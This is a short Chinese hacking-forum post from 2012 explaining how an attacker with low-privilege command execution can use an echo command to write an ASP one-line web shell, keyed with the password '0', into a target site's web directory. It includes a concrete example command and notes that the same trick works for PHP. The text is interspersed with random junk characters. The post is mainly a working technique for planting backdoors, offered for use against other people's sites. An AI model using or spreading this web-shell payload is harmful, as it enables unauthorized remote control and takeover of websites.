在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。, O: H0 x( P9 `2 [* J. n
; }' |, H& o8 k% t" O) h命令格式
4 Y, c8 x. x7 N" q" H" L* U
9 w& e1 j5 A+ M9 _3 J& }Echo 语句 >目标站绝对目录* x( h5 k( q8 M! u; S/ W2 E# `
& x5 H. U0 E4 }& [
例如: 7 G4 q' S9 y5 t8 l4 H8 }5 h
/ P3 e2 Z5 R* S% `echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp) i+ J/ X5 Z( q6 l- J7 O
) l i# u2 q( q5 ]; v8 a% i$ E a这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。6 f5 @& P' M/ Z& n. X4 ^8 q& h
|
发表于 2012-9-23 14:40:24
收藏
分享
支持
反对